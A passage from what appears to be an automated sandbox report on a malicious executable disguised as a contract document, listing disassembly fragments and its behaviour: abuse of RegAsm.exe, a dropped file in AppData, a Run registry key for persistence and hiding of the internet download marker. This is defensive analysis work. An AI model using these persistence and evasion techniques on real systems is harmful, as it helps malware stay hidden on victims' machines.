            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A184B push esp; retn 005Ch2_2_022A1865
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A0252 push esi; retn 0076h2_2_022A0265
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A288A push cs; ret 2_2_022A2897
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A30F0 push edx; retf 2_2_022A30F8
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A4338 push si; retf 0016h2_2_022A4345
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A4D60 push esp; retf 2_2_022A4D64
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A2B66 push esi; retf 0002h2_2_022A2B69
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A334D push esp; retf 0047h2_2_022A3395
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A4D43 push esp; retf 2_2_022A4D49
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A0B57 push esi; retn 007Dh2_2_022A0B5D
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A47AA push esi; retn 0032h2_2_022A47AD
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A2DDC push esp; retf 0069h2_2_022A2DE1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CA66E1 push ebx; ret 9_2_00CA66EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CA4E78 push ebx; retf FE00h9_2_00CA53A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CB43A0 push 9200CB3Eh; retf 9_2_00CB43A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CB0360 push es; retf 9_2_00CB077E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00D54DD6 push ecx; iretd 9_2_00D54DDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00D54DF5 push ecx; iretd 9_2_00D54DF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00D5261F push edi; retn 0000h9_2_00D52621
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcRJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcRJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppDat